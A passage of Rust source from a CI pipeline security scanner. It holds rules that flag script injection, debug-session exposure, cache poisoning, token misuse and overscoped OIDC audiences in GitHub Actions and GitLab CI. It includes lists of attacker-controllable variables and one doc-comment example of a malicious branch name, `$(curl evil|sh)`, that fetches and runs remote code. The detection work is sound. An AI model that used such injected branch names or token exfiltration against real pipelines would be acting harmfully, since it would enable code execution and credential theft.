    }
    found
}
4313
/// Decides whether a `${{ … }}` expression (already trimmed by the caller)
/// reads a value that R1 treats as attacker-controllable.
///
/// The checks are alternatives — any one of them is enough:
/// - the expression starts with one of the `github.event.*` prefixes listed
///   in `UNTRUSTED_EVENT_PREFIXES` (e.g. `github.event.issue.title`,
///   `github.event.comment.body`, `github.event.inputs.x`);
/// - the expression starts with `github.head_ref` and that identifier ends
///   there, whether bare or followed by a space, operator or bracket.
///   `github.head_ref||'main'` therefore qualifies, while
///   `github.head_ref_name` (a different identifier) does not;
/// - the expression starts with `inputs.` followed by at least one
///   character.
///
/// Only the start of the expression is examined; an untrusted value nested
/// inside a function call such as `format(…)` is not detected here.
fn is_untrusted_context_expression(expr: &str) -> bool {
    const UNTRUSTED_EVENT_PREFIXES: &[&str] = &[
        "github.event.issue.",
        "github.event.pull_request.",
        "github.event.comment.",
        "github.event.review.",
        "github.event.discussion.",
        "github.event.workflow_run.",
        "github.event.inputs.",
    ];

    if UNTRUSTED_EVENT_PREFIXES
        .iter()
        .any(|prefix| expr.starts_with(prefix))
    {
        return true;
    }

    // `github.head_ref` must stand as a complete identifier: whatever
    // follows may not extend the name.
    if let Some(rest) = expr.strip_prefix("github.head_ref") {
        let extends_identifier = rest
            .chars()
            .next()
            .map_or(false, |c| c.is_ascii_alphanumeric() || c == '_' || c == '-');
        if !extends_identifier {
            return true;
        }
    }

    // `inputs.X` is attacker-influenced under workflow_dispatch /
    // workflow_run / issue_comment-driven inputs, so any named input is
    // suspect.
    matches!(expr.strip_prefix("inputs."), Some(rest) if !rest.is_empty())
}
4344
/// Hook deciding whether the expression at `_range` inside `_body` lands in
/// a sink that matters for R1 (shell text, JS source, or a write to
/// GITHUB_ENV / GITHUB_OUTPUT).
///
/// Currently every occurrence qualifies and both arguments are ignored.
/// The caller passes the contents of `META_SCRIPT_BODY`, which is the
/// script source itself. Step-level `env:` values are kept apart from the
/// body, so an expression found in the body has by definition bypassed the
/// env-indirection mitigation.
///
/// The function exists so this rationale has a home and so later, narrower
/// heuristics have an obvious place to go.
fn is_script_injection_sink(_body: &str, _range: &std::ops::Range<usize>) -> bool {
    true
}
4359
4360/// R1 — script injection via untrusted context.
4361///
4362/// Severity: Critical. Classic GitHub Actions remote code execution: an
4363/// expression that an external actor controls (`github.event.issue.title`,
4364/// `github.head_ref`, `github.event.inputs.*` under `workflow_dispatch`)
4365/// gets concatenated into the shell command (or JS source for
4366/// `actions/github-script`) at YAML-render time, before any quoting or
4367/// escaping the runtime would apply to env-bound values.
4368pub fn script_injection_via_untrusted_context(graph: &AuthorityGraph) -> Vec<Finding> {
4369    let mut findings = Vec::new();
4370
4371    for step in graph.nodes_of_kind(NodeKind::Step) {
4372        let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
4373            continue;
4374        };
4375        if body.is_empty() {
4376            continue;
4377        }
4378
4379        let mut hits: Vec<String> = Vec::new();
4380        for (expr, range) in find_template_expressions(body) {
4381            if !is_untrusted_context_expression(&expr) {
4382                continue;
4383            }
4384            if !is_script_injection_sink(body, &range) {
4385                continue;
4386            }
4387            if !hits.contains(&expr) {
4388                hits.push(expr);
4389            }
4390        }
4391
4392        if hits.is_empty() {
4393            continue;
4394        }
4395
4396        // Cap preview to keep the message readable even when a step has many
4397        // distinct attacker-controlled interpolations.
4398        let preview: String = hits
4399            .iter()
4400            .take(3)
4401            .map(|s| format!("${{{{ {s} }}}}"))
4402            .collect::<Vec<_>>()
4403            .join(", ");
4404        let suffix = if hits.len() > 3 {
4405            format!(", and {} more", hits.len() - 3)
4406        } else {
4407            String::new()
4408        };
4409
4410        findings.push(Finding {
4411            severity: Severity::Critical,
4412            category: FindingCategory::ScriptInjectionViaUntrustedContext,
4413            path: None,
4414            nodes_involved: vec![step.id],
4415            message: format!(
4416                "Step '{}' interpolates attacker-controlled expression(s) {preview}{suffix} directly into a script body without an env: indirection — classic GitHub Actions RCE",
4417                step.name
4418            ),
4419            recommendation: Recommendation::Manual {
4420                action: "Bind the expression to a step-level `env:` variable and reference it as `\"$VAR\"` (shell) or `process.env.VAR` (JS). The runtime then quotes the value as data instead of YAML-rendering it as code.".into(),
4421            },
4422            source: FindingSource::BuiltIn,
4423            extras: FindingExtras::default(),
4424        });
4425    }
4426
4427    findings
4428}
4429
4430/// R5 — interactive debug action in an authority workflow.
4431///
4432/// Severity: High. A successful tmate / upterm session opens an external SSH
4433/// endpoint into the runner with the full job environment loaded — every
4434/// secret in scope, the checked-out HEAD, and write access to whatever the
4435/// GITHUB_TOKEN holds. Anyone who can flip `debug_enabled=true` at job start
4436/// (often a maintainer with `workflow_dispatch` permission) can launder the
4437/// job's authority off the runner.
4438pub fn interactive_debug_action_in_authority_workflow(graph: &AuthorityGraph) -> Vec<Finding> {
4439    let mut findings = Vec::new();
4440
4441    // Pre-compute whether the workflow holds non-default authority.
4442    // Two ways to qualify:
4443    //  (a) any step has access to a non-GITHUB_TOKEN Secret or Identity, OR
4444    //  (b) any GITHUB_TOKEN identity has a non-default write permission.
4445    let workflow_has_extra_secrets = graph.authority_sources().any(|n| match n.kind {
4446        NodeKind::Secret => true,
4447        NodeKind::Identity => {
4448            // GITHUB_TOKEN identities are named `GITHUB_TOKEN` or
4449            // `GITHUB_TOKEN (<job>)`. Anything else is extra authority
4450            // (cloud OIDC, ADO service connection, …).
4451            !n.name.starts_with("GITHUB_TOKEN")
4452        }
4453        _ => false,
4454    });
4455
4456    let workflow_has_token_writes = graph
4457        .nodes_of_kind(NodeKind::Identity)
4458        .filter(|n| n.name.starts_with("GITHUB_TOKEN"))
4459        .any(|n| {
4460            n.metadata
4461                .get(META_PERMISSIONS)
4462                .map(|p| {
4463                    let s = p.to_lowercase();
4464                    s.contains("write") || s == "write-all"
4465                })
4466                .unwrap_or(false)
4467        });
4468
4469    if !(workflow_has_extra_secrets || workflow_has_token_writes) {
4470        return findings;
4471    }
4472
4473    for step in graph.nodes_of_kind(NodeKind::Step) {
4474        let Some(action_ref) = step.metadata.get(META_INTERACTIVE_DEBUG) else {
4475            continue;
4476        };
4477
4478        findings.push(Finding {
4479            severity: Severity::High,
4480            category: FindingCategory::InteractiveDebugActionInAuthorityWorkflow,
4481            path: None,
4482            nodes_involved: vec![step.id],
4483            message: format!(
4484                "Step '{}' uses interactive debug action '{action_ref}' inside a workflow that holds non-default secrets or write permissions — a successful debug session forwards the runner's full environment over SSH",
4485                step.name
4486            ),
4487            recommendation: Recommendation::Manual {
4488                action: "Move the debug action into a separate workflow with no secret access and `permissions: read-all`, OR gate the step on an explicit short-lived `workflow_dispatch` input that is removed after use. Never run tmate/upterm in a workflow that holds production credentials.".into(),
4489            },
4490            source: FindingSource::BuiltIn,
4491            extras: FindingExtras::default(),
4492        });
4493    }
4494
4495    findings
4496}
4497
4498/// R9 — PR-specific cache key in a default-branch consumer.
4499///
4500/// Severity: Medium. Speculative rule from the council gap report; the corpus
4501/// did not show a perfect example, so we emit Medium and document the risk.
4502/// A PR build that writes to a cache keyed on `github.head_ref` /
4503/// `github.event.pull_request.head.ref` / `github.actor` populates an entry
4504/// that a later default-branch run can restore — letting an attacker poison
4505/// the build cache from a fork PR.
4506pub fn pr_specific_cache_key_in_default_branch_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
4507    let mut findings = Vec::new();
4508
4509    // Trigger gate: workflow must run on `push` (default branch) AND on a
4510    // PR-context trigger. Without the push side, the cache write never gets
4511    // restored by a privileged consumer; without the PR side, no untrusted
4512    // contributor can populate the cache to begin with.
4513    let triggers = graph.metadata.get(META_TRIGGERS);
4514    let runs_on_push = triggers_contain_any(triggers, &["push"]);
4515    let runs_on_pr = triggers_contain_any(triggers, &["pull_request", "pull_request_target"]);
4516    if !(runs_on_push && runs_on_pr) {
4517        return findings;
4518    }
4519
4520    for step in graph.nodes_of_kind(NodeKind::Step) {
4521        let Some(key) = step.metadata.get(META_CACHE_KEY) else {
4522            continue;
4523        };
4524        if key.is_empty() {
4525            continue;
4526        }
4527        // Detect PR-derived key fragments. Match common spelling variants.
4528        let lower = key.to_lowercase();
4529        let is_pr_keyed = lower.contains("github.head_ref")
4530            || lower.contains("github.event.pull_request.head.ref")
4531            || lower.contains("github.event.pull_request.head.sha")
4532            || lower.contains("github.actor")
4533            || lower.contains("github.triggering_actor");
4534        if !is_pr_keyed {
4535            continue;
4536        }
4537
4538        findings.push(Finding {
4539            severity: Severity::Medium,
4540            category: FindingCategory::PrSpecificCacheKeyInDefaultBranchConsumer,
4541            path: None,
4542            nodes_involved: vec![step.id],
4543            message: format!(
4544                "Step '{}' caches with a PR-derived key ('{key}') in a workflow that also runs on push — a fork PR can poison the cache that the default-branch build later restores",
4545                step.name
4546            ),
4547            recommendation: Recommendation::Manual {
4548                action: "Split the workflow so the `actions/cache` save side runs only on `push: branches: [main]` (or another protected ref) and PR runs use cache restore-only with `lookup-only: true`. Alternatively, key the cache on the file hashes that determine its content, not the branch or actor.".into(),
4549            },
4550            source: FindingSource::BuiltIn,
4551            extras: FindingExtras::default(),
4552        });
4553    }
4554
4555    findings
4556}
4557
4558/// R10 — `gh` / `gh api` runtime escalation with the default GITHUB_TOKEN.
4559///
4560/// Severity: Medium. Static permission checks see only the declared
4561/// `permissions:` block — they miss runtime calls that use the token to
4562/// perform write-class operations the workflow shouldn't be doing in a
4563/// PR-triggered context. Detects `gh ` invocations that mutate state
4564/// (`pr merge`, `release create/upload`, `api -X POST/PATCH/PUT/DELETE`)
4565/// in workflows triggered by `pull_request`, `issue_comment`, or
4566/// `workflow_run`.
4567pub fn gh_cli_with_default_token_escalating(graph: &AuthorityGraph) -> Vec<Finding> {
4568    let mut findings = Vec::new();
4569
4570    // Trigger gate.
4571    let triggers = graph.metadata.get(META_TRIGGERS);
4572    let risky_trigger = triggers_contain_any(
4573        triggers,
4574        &[
4575            "pull_request",
4576            "pull_request_target",
4577            "issue_comment",
4578            "workflow_run",
4579            "pull_request_review",
4580            "pull_request_review_comment",
4581        ],
4582    );
4583    if !risky_trigger {
4584        return findings;
4585    }
4586
4587    for step in graph.nodes_of_kind(NodeKind::Step) {
4588        let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
4589            continue;
4590        };
4591        if body.is_empty() {
4592            continue;
4593        }
4594        if !body_contains_gh_cli(body) {
4595            continue;
4596        }
4597        let Some(verb) = detect_gh_escalating_verb(body) else {
4598            continue;
4599        };
4600
4601        findings.push(Finding {
4602            severity: Severity::Medium,
4603            category: FindingCategory::GhCliWithDefaultTokenEscalating,
4604            path: None,
4605            nodes_involved: vec![step.id],
4606            message: format!(
4607                "Step '{}' invokes `gh {verb}` against the default GITHUB_TOKEN inside a workflow triggered by an untrusted context — runtime privilege escalation that static permission checks miss",
4608                step.name
4609            ),
4610            recommendation: Recommendation::Manual {
4611                action: "Move write-class `gh`/`gh api` calls into a separate workflow gated on `push` (or an explicit reusable workflow with `secrets: inherit` only for the writer side). On the PR-triggered side, enforce `permissions: read-all` and verify by re-reading the GitHub Actions audit log.".into(),
4612            },
4613            source: FindingSource::BuiltIn,
4614            extras: FindingExtras::default(),
4615        });
4616    }
4617
4618    findings
4619}
4620
/// Reports whether some line of `body` runs the `gh` CLI as a command, as
/// opposed to merely containing the letters `gh` inside another word.
///
/// A line counts when, after leading whitespace is removed, it begins with
/// `gh` followed by a space or tab, or when it contains `gh ` directly after
/// one of the inline shell forms listed in `INLINE_FORMS`.
fn body_contains_gh_cli(body: &str) -> bool {
    // `gh ` following a command separator, pipe, or command substitution.
    const INLINE_FORMS: [&str; 6] = ["&& gh ", "|| gh ", "; gh ", "$(gh ", "`gh ", "| gh "];

    body.lines().map(str::trim_start).any(|command| {
        command.starts_with("gh ")
            || command.starts_with("gh\t")
            || INLINE_FORMS.iter().any(|form| command.contains(*form))
    })
}
4639
/// If `body` invokes a write-class `gh` verb, return a short label for it;
/// otherwise return `None`.
///
/// Matching is case-insensitive and substring-based. Backslash-newline
/// continuations are folded into a space first, so a command split across
/// several physical lines (the layout used in GitHub's REST API examples)
/// is inspected as one logical line.
///
/// Recognised, in priority order:
///   - `gh pr merge`
///   - `gh release create` / `upload` / `delete` / `edit`
///   - `gh api` with an explicit `POST|PATCH|PUT|DELETE` method given as
///     `-X M`, `-XM`, `--method M` or `--method=M`, anywhere after `gh api`
///     on the same logical line (label `api -X <METHOD>`)
///   - `gh api` plus a mutation-endpoint path fragment (`actions/secrets`,
///     `actions/variables`, `/environments`, `/releases`) plus a body flag
///     (`-f`/`-F`/`--field`/`--input`) (label `api (mutation endpoint)`)
fn detect_gh_escalating_verb(body: &str) -> Option<String> {
    // Lower-case once; join continued lines so flags on a continuation line
    // are seen together with the `gh api` that owns them.
    let lower = body
        .to_lowercase()
        .replace("\\\r\n", " ")
        .replace("\\\n", " ");

    // Plain sub-commands that always mutate state.
    for verb in [
        "pr merge",
        "release create",
        "release upload",
        "release delete",
        "release edit",
    ] {
        if lower.contains(&format!("gh {verb}")) {
            return Some(verb.into());
        }
    }

    // Explicit HTTP method. The method token must follow the flag directly,
    // so a header flag such as `-X-Foo` is not mistaken for a method.
    for method in ["post", "patch", "put", "delete"] {
        let spellings = [
            format!(" -x {method}"),
            format!(" -x{method}"),
            format!(" --method {method}"),
            format!(" --method={method}"),
        ];
        let explicit = lower.lines().any(|line| {
            let Some(at) = line.find("gh api ") else {
                return false;
            };
            // Keep the space after `gh api` so a flag that comes first still
            // has its leading-space anchor.
            let args = &line[at + "gh api".len()..];
            spellings.iter().any(|flag| args.contains(flag.as_str()))
        });
        if explicit {
            return Some(format!("api -X {}", method.to_uppercase()));
        }
    }

    // Path-based heuristic: even without an explicit method, some endpoints
    // are mutation endpoints (`gh api repos/.../actions/secrets/FOO -F ...`).
    let path_markers = [
        "actions/secrets",
        "actions/variables",
        "/environments",
        "/releases",
    ];
    if lower.contains("gh api ") && path_markers.iter().any(|m| lower.contains(m)) {
        // Only escalate when a body flag is present as well; under `gh api`
        // those flags imply a write request. `-F` is covered by the
        // lower-casing above.
        let writes = lower.contains(" -f ")
            || lower.contains(" -f=")
            || lower.contains(" -f\"")
            || lower.contains(" --field")
            || lower.contains(" --input");
        if writes {
            return Some("api (mutation endpoint)".into());
        }
    }
    None
}
4694
4695// ── GitLab CI rules ─────────────────────────────────────────
4696
/// GitLab CI predefined variables treated as attacker-controllable: their
/// values come from a branch name, tag, commit message / author, or merge
/// request title / description, all of which someone pushing a branch or
/// opening an MR can choose. When one of these is interpolated into an
/// unquoted shell expansion the runner executes whatever the attacker put
/// inside `` $(...) `` or backticks.
///
/// `untrusted_ci_var_in_shell_interpolation` checks each name, in this
/// order, against a step's script body and its `environment:url:` value;
/// the order is therefore also the order in which matched names appear in
/// that rule's finding message.
const UNTRUSTED_GITLAB_CI_VARS: &[&str] = &[
    "CI_COMMIT_BRANCH",
    "CI_COMMIT_REF_NAME",
    "CI_COMMIT_TAG",
    "CI_COMMIT_MESSAGE",
    "CI_COMMIT_TITLE",
    "CI_COMMIT_DESCRIPTION",
    "CI_COMMIT_AUTHOR",
    "CI_MERGE_REQUEST_TITLE",
    "CI_MERGE_REQUEST_DESCRIPTION",
    "CI_MERGE_REQUEST_SOURCE_BRANCH_NAME",
];
4713
4714/// Rule: `$CI_JOB_TOKEN` (the GitLab platform-injected job token, broad scope
4715/// by default — registry write, package upload, project read) used as a
4716/// bearer credential against an external HTTP endpoint, or fed to
4717/// `docker login` for `registry.gitlab.com`.
4718///
4719/// Detection: read the Step's `META_SCRIPT_BODY`. Fire when the body
4720/// contains `$CI_JOB_TOKEN` or `${CI_JOB_TOKEN}` AND any of:
4721/// - a `curl` / `wget` / `http` / `https.request` invocation, OR
4722/// - the literal `gitlab-ci-token:` (the token-as-Basic-auth idiom), OR
4723/// - a `docker login` for `registry.gitlab.com`.
4724///
4725/// Severity: High. Category: Credentials.
4726pub fn ci_job_token_to_external_api(graph: &AuthorityGraph) -> Vec<Finding> {
4727    let mut findings = Vec::new();
4728
4729    for step in graph.nodes_of_kind(NodeKind::Step) {
4730        let body = match step.metadata.get(META_SCRIPT_BODY) {
4731            Some(b) if !b.is_empty() => b,
4732            _ => continue,
4733        };
4734
4735        if !body_references_ci_job_token(body) {
4736            continue;
4737        }
4738
4739        let sink = classify_ci_job_token_sink(body);
4740        let Some(sink) = sink else {
4741            continue;
4742        };
4743
4744        findings.push(Finding {
4745            severity: Severity::High,
4746            category: FindingCategory::CiJobTokenToExternalApi,
4747            path: None,
4748            nodes_involved: vec![step.id],
4749            message: format!(
4750                "Step '{}' uses $CI_JOB_TOKEN as a bearer credential ({}) — the token's default scope (registry write, package upload, project read) means a poisoned MR job that emits it can pivot to package or registry pushes",
4751                step.name, sink
4752            ),
4753            recommendation: Recommendation::Manual {
4754                action: "Scope CI_JOB_TOKEN: in Settings → CI/CD → Job token permissions, set the inbound allowlist to the minimum projects required and disable any unused scope (package_registry, container_registry). For uploads, prefer a dedicated short-lived deploy token over CI_JOB_TOKEN. Never POST CI_JOB_TOKEN to webhooks or third-party APIs.".into(),
4755            },
4756            source: FindingSource::BuiltIn,
4757            extras: FindingExtras::default(),
4758        });
4759    }
4760
4761    findings
4762}
4763
/// True when `body` contains the job token in either shell spelling,
/// `$CI_JOB_TOKEN` or `${CI_JOB_TOKEN}`. The match is case-sensitive.
fn body_references_ci_job_token(body: &str) -> bool {
    ["$CI_JOB_TOKEN", "${CI_JOB_TOKEN}"]
        .iter()
        .any(|spelling| body.contains(*spelling))
}
4767
4768/// Classify how `$CI_JOB_TOKEN` is being used. Returns a short human-readable
4769/// sink description, or None when the token only appears in benign ways
4770/// (e.g. assignment to an env var that's never read).
4771fn classify_ci_job_token_sink(body: &str) -> Option<&'static str> {
4772    let lower = body.to_lowercase();
4773    // gitlab-ci-token:$CI_JOB_TOKEN — the canonical Basic-auth idiom.
4774    if lower.contains("gitlab-ci-token:") && body_references_ci_job_token(body) {
4775        if lower.contains("docker login") && lower.contains("registry.gitlab.com") {
4776            return Some("docker login registry.gitlab.com");
4777        }
4778        if lower.contains("curl") || lower.contains("wget") {
4779            return Some("curl/wget Basic auth (user gitlab-ci-token)");
4780        }
4781        return Some("Basic-auth credential (user gitlab-ci-token)");
4782    }
4783    // JOB-TOKEN: header form (curl/wget against /api/v4/...).
4784    if lower.contains("job-token:") && body_references_ci_job_token(body) {
4785        return Some("JOB-TOKEN header to GitLab API");
4786    }
4787    // curl --header "PRIVATE-TOKEN: $CI_JOB_TOKEN" or similar bearer use.
4788    if (lower.contains("curl") || lower.contains("wget"))
4789        && (lower.contains("authorization:") || lower.contains("private-token:"))
4790        && body_references_ci_job_token(body)
4791    {
4792        return Some("Authorization/PRIVATE-TOKEN header to HTTP endpoint");
4793    }
4794    // Generic: token appears next to a CI_API_V4_URL request — strong signal.
4795    if body.contains("CI_API_V4_URL") && body_references_ci_job_token(body) {
4796        return Some("HTTP request to ${CI_API_V4_URL} with token");
4797    }
4798    None
4799}
4800
4801/// Rule: GitLab `id_tokens:` audience reused across MR-context and
4802/// protected-context jobs in the same file (no audience separation), or set
4803/// to a wildcard / multi-cloud broker URL, or shared with a `secrets:` Vault
4804/// path that the consuming job doesn't need.
4805///
4806/// Detection: collect every OIDC Identity node (Identity with
4807/// `META_OIDC == "true"`) carrying a `META_OIDC_AUDIENCE`. For each audience:
4808/// - Wildcard / `*` audience → fire (b).
4809/// - Same audience reachable from at least one Step marked `META_TRIGGER ==
4810///   merge_request` AND at least one Step that is NOT (i.e. protected-context
4811///   only) → fire (a).
4812///
4813/// Severity: High. Category: Privilege.
4814pub fn id_token_audience_overscoped(graph: &AuthorityGraph) -> Vec<Finding> {
4815    use std::collections::HashMap as Map;
4816
4817    let mut findings = Vec::new();
4818
4819    // Collect (audience → (identity_id, [step_ids that reach it])).
4820    let mut by_aud: Map<&str, Vec<(NodeId, Vec<NodeId>)>> = Map::new();
4821
4822    for ident in graph.nodes_of_kind(NodeKind::Identity) {
4823        let is_oidc = ident.metadata.get(META_OIDC).map(String::as_str) == Some("true");
4824        if !is_oidc {
4825            continue;
4826        }
4827        let Some(aud) = ident.metadata.get(META_OIDC_AUDIENCE) else {
4828            continue;
4829        };
4830        if aud == "unknown" || aud.is_empty() {
4831            continue;
4832        }
4833
4834        // Find steps that hold this identity via HasAccessTo.
4835        let mut consumers: Vec<NodeId> = Vec::new();
4836        for step in graph.nodes_of_kind(NodeKind::Step) {
4837            let holds = graph
4838                .edges_from(step.id)
4839                .any(|e| e.kind == EdgeKind::HasAccessTo && e.to == ident.id);
4840            if holds {
4841                consumers.push(step.id);
4842            }
4843        }
4844        by_aud
4845            .entry(aud.as_str())
4846            .or_default()
4847            .push((ident.id, consumers));
4848    }
4849
4850    for (aud, entries) in &by_aud {
4851        // (b) Wildcard / suspiciously broad audience.
4852        let is_wildcard = *aud == "*"
4853            || aud.contains("/*")
4854            || aud.eq_ignore_ascii_case("any")
4855            || aud.eq_ignore_ascii_case("default");
4856        if is_wildcard {
4857            // Use the first identity node as the anchor.
4858            if let Some((ident_id, consumers)) = entries.first() {
4859                let mut nodes_involved = vec![*ident_id];
4860                nodes_involved.extend(consumers.iter().copied());
4861                findings.push(Finding {
4862                    severity: Severity::High,
4863                    category: FindingCategory::IdTokenAudienceOverscoped,
4864                    path: None,
4865                    nodes_involved,
4866                    message: format!(
4867                        "OIDC id_token audience '{aud}' is wildcard / catch-all — any cloud / Vault role bound to this audience is reachable from every job that mints the token"
4868                    ),
4869                    recommendation: Recommendation::Manual {
4870                        action: "Replace the wildcard `aud:` with a job- or environment-specific audience (e.g. `vault.gitlab.net/prod-deploy`, `aws-deploy-staging`). Bind the downstream role / Vault path to that exact audience so unrelated jobs can't trade the token for the same credential.".into(),
4871                    },
4872                    source: FindingSource::BuiltIn,
4873                    extras: FindingExtras::default(),
4874                });
4875                continue;
4876            }
4877        }
4878
4879        // (a) Same audience reachable from MR-context AND non-MR-context steps.
4880        let all_consumers: Vec<NodeId> = entries
4881            .iter()
4882            .flat_map(|(_, c)| c.iter().copied())
4883            .collect();
4884        let mut has_mr = false;
4885        let mut has_protected = false;
4886        for sid in &all_consumers {
4887            let Some(step) = graph.node(*sid) else {
4888                continue;
4889            };
4890            if step.metadata.get(META_TRIGGER).map(String::as_str) == Some("merge_request") {
4891                has_mr = true;
4892            } else {
4893                has_protected = true;
4894            }
4895        }
4896        if has_mr && has_protected && !entries.is_empty() {
4897            // Anchor at the first identity node carrying this audience.
4898            let (ident_id, _) = &entries[0];
4899            let mut nodes_involved = vec![*ident_id];
4900            nodes_involved.extend(all_consumers.iter().copied());
4901            findings.push(Finding {
4902                severity: Severity::High,
4903                category: FindingCategory::IdTokenAudienceOverscoped,
4904                path: None,
4905                nodes_involved,
4906                message: format!(
4907                    "OIDC id_token audience '{aud}' is shared across merge_request_event jobs and protected-branch jobs — a poisoned MR can mint a token with the same audience as the production deploy and trade it for the same downstream cloud / Vault role"
4908                ),
4909                recommendation: Recommendation::Manual {
4910                    action: "Split audiences by trust context: declare a separate `aud:` for MR-context jobs (e.g. `…/mr-validate`) and a different `aud:` for protected-branch jobs (e.g. `…/prod-deploy`). Bind each downstream role / Vault path to the exact audience of the job that needs it.".into(),
4911                },
4912                source: FindingSource::BuiltIn,
4913                extras: FindingExtras::default(),
4914            });
4915        }
4916    }
4917
4918    findings
4919}
4920
4921/// Rule: untrusted GitLab predefined variable interpolated unquoted into a
4922/// shell context (`script:` / `before_script:` / `after_script:` /
4923/// `environment:url:`). A branch named `` $(curl evil|sh) `` then runs as
4924/// part of the runner.
4925///
4926/// Detection: for each Step, scan `META_SCRIPT_BODY` and `META_ENVIRONMENT_URL`
4927/// for any of `UNTRUSTED_GITLAB_CI_VARS` referenced via `$VAR`, `${VAR}`, or
4928/// `"$VAR"`/`"${VAR}"` (double-quoted — still expanded). A reference inside
4929/// single quotes does NOT fire. Same for `printf %q` / `${VAR@Q}` /
4930/// `${VAR//[^A-Za-z0-9]/}` sanitised forms.
4931///
4932/// Severity: High. Category: Injection.
4933pub fn untrusted_ci_var_in_shell_interpolation(graph: &AuthorityGraph) -> Vec<Finding> {
4934    let mut findings = Vec::new();
4935
4936    for step in graph.nodes_of_kind(NodeKind::Step) {
4937        let mut hits: Vec<&str> = Vec::new();
4938        let mut where_hit: Vec<&str> = Vec::new();
4939
4940        if let Some(body) = step.metadata.get(META_SCRIPT_BODY) {
4941            for var in UNTRUSTED_GITLAB_CI_VARS {
4942                if shell_body_unsafely_expands(body, var) {
4943                    hits.push(*var);
4944                    where_hit.push("script");
4945                }
4946            }
4947        }
4948        if let Some(url) = step.metadata.get(META_ENVIRONMENT_URL) {
4949            for var in UNTRUSTED_GITLAB_CI_VARS {
4950                if url_interpolates_var(url, var) {
4951                    if !hits.contains(var) {
4952                        hits.push(*var);
4953                    }
4954                    if !where_hit.contains(&"environment.url") {
4955                        where_hit.push("environment.url");
4956                    }
4957                }
4958            }
4959        }
4960
4961        if hits.is_empty() {
4962            continue;
4963        }
4964
4965        // Dedup hit list while preserving order.
4966        let mut seen = std::collections::HashSet::new();
4967        let names: Vec<&str> = hits.into_iter().filter(|n| seen.insert(*n)).collect();
4968        let mut wh = where_hit;
4969        wh.sort();
4970        wh.dedup();
4971        let where_str = wh.join(" + ");
4972        let names_str = names.join(", ");
4973
4974        findings.push(Finding {
4975            severity: Severity::High,
4976            category: FindingCategory::UntrustedCiVarInShellInterpolation,
4977            path: None,
4978            nodes_involved: vec![step.id],
4979            message: format!(
4980                "Step '{}' interpolates attacker-controlled GitLab predefined variable(s) [{}] into {} without single-quote isolation — a branch / tag / commit message containing `$(...)` executes inside the runner",
4981                step.name, names_str, where_str
4982            ),
4983            recommendation: Recommendation::Manual {
4984                action: "Pass the untrusted value through the step's `variables:` / `env:` block (one variable per step), then reference it inside the script as `\"$BRANCH\"` (double-quoted is fine when the value is bound to a real shell variable, not YAML-interpolated). For commands that must include the value, sanitise with `printf %q` or `${VAR//[^A-Za-z0-9_-]/}` first. For `environment:url:`, never interpolate `$CI_COMMIT_*` directly — use a slug-only variable (`$CI_COMMIT_REF_SLUG` is sanitised by GitLab).".into(),
4985            },
4986            source: FindingSource::BuiltIn,
4987            extras: FindingExtras::default(),
4988        });
4989    }
4990
4991    findings
4992}
4993
/// Reports whether `body` expands `$VAR` / `${VAR}` (for the given `var`
/// name) somewhere it is neither inside single quotes nor on a line that
/// shows an obvious sanitiser.
///
/// The check is line-based and intentionally leans towards flagging: a
/// missed expansion is considered far more costly than an extra finding.
/// Per line, after stripping leading `-`, spaces and tabs:
///   - empty lines and lines starting with `#` are ignored;
///   - a line containing `printf %q`, or `${` together with `@Q}` or `//[^`,
///     is treated as sanitised as a whole;
///   - an occurrence preceded on that line by an odd number of `'`
///     characters is treated as single-quoted.
/// Any remaining occurrence makes the function return `true`.
fn shell_body_unsafely_expands(body: &str, var: &str) -> bool {
    let bare = format!("${var}");
    let braced = format!("${{{var}}}");

    // Cheap exit when the variable is not mentioned anywhere.
    if !(body.contains(&bare) || body.contains(&braced)) {
        return false;
    }

    body.lines().any(|raw| {
        let line = raw.trim_start_matches(['-', ' ', '\t']);
        if line.is_empty() || line.starts_with('#') {
            return false;
        }

        // The sanitiser markers are looked up on the whole line, so one
        // marker exempts every occurrence on it.
        let sanitised = line.contains("printf %q")
            || (line.contains("${") && (line.contains("@Q}") || line.contains("//[^")));
        if sanitised {
            return false;
        }

        // An even number of single quotes before the occurrence means it
        // sits outside any '...' region.
        line.match_indices(bare.as_str())
            .chain(line.match_indices(braced.as_str()))
            .any(|(at, _)| line[..at].matches('\'').count() % 2 == 0)
    })
}
5042
/// Reports whether `url` textually contains a reference to the variable
/// `var`, in either the bare (`$VAR`) or the braced (`${VAR}`) spelling.
fn url_interpolates_var(url: &str, var: &str) -> bool {
    let spellings = [format!("${var}"), format!("${{{var}}}")];
    spellings.iter().any(|needle| url.contains(needle.as_str()))
}
5048
5049// ── GitLab CI rules ─────────────────────────────────────
5050//
5051// Five rules sourced from the v0.9.0 GitLab corpus gap analysis (council
5052// review of 277 .gitlab-ci.yml files). Detection inputs come from metadata
5053// stamped by `taudit-parse-gitlab` — see `META_GITLAB_*` constants. Each rule
5054// is a no-op on graphs from non-GitLab parsers (the markers will simply be
5055// absent), so wiring all five into `run_all_rules` is safe.
5056
/// Mutable branch names used as `ref:` on includes — anyone with push to one
/// of these on the source repo can backdoor every consumer's pipeline.
///
/// `unpinned_include_remote_or_branch_ref` compares the `ref:` of a
/// `project` include against this list ignoring ASCII case, so the spelling
/// used here (e.g. `HEAD` vs `head`) does not matter.
const MUTABLE_BRANCH_REFS: &[&str] = &[
    "main", "master", "develop", "dev", "trunk", "default", "HEAD",
];
5062
/// Extracts the ref of a GitLab raw-file URL (`.../-/raw/<ref>/<path>`) when
/// that ref looks like a mutable branch.
///
/// Returns `None` when the URL has no `/-/raw/` segment, when the ref segment
/// is empty, or when the ref follows an immutable-looking convention:
/// * a 40-character hexadecimal string (full commit SHA);
/// * `v` followed by a digit (`v1`, `v2.3.0`, ...);
/// * a dotted version starting with a digit (`1.2.3`, `2024.01`).
///
/// Everything else is treated as a branch and returned as `Some(ref)`. The
/// dotted-version rule deliberately requires a leading digit so that names
/// such as `release-1.2` are still reported.
fn remote_url_uses_branch(url: &str) -> Option<String> {
    const RAW_MARKER: &str = "/-/raw/";

    // The ref is the path segment right after the first `/-/raw/`.
    let (_, after_marker) = url.split_once(RAW_MARKER)?;
    let ref_seg = after_marker.split('/').next().filter(|seg| !seg.is_empty())?;

    let is_full_sha = ref_seg.len() == 40 && ref_seg.chars().all(|c| c.is_ascii_hexdigit());

    // Byte-level inspection is safe here: only ASCII bytes are compared, and
    // an ASCII byte is always a complete character in UTF-8.
    let looks_like_tag = match ref_seg.as_bytes() {
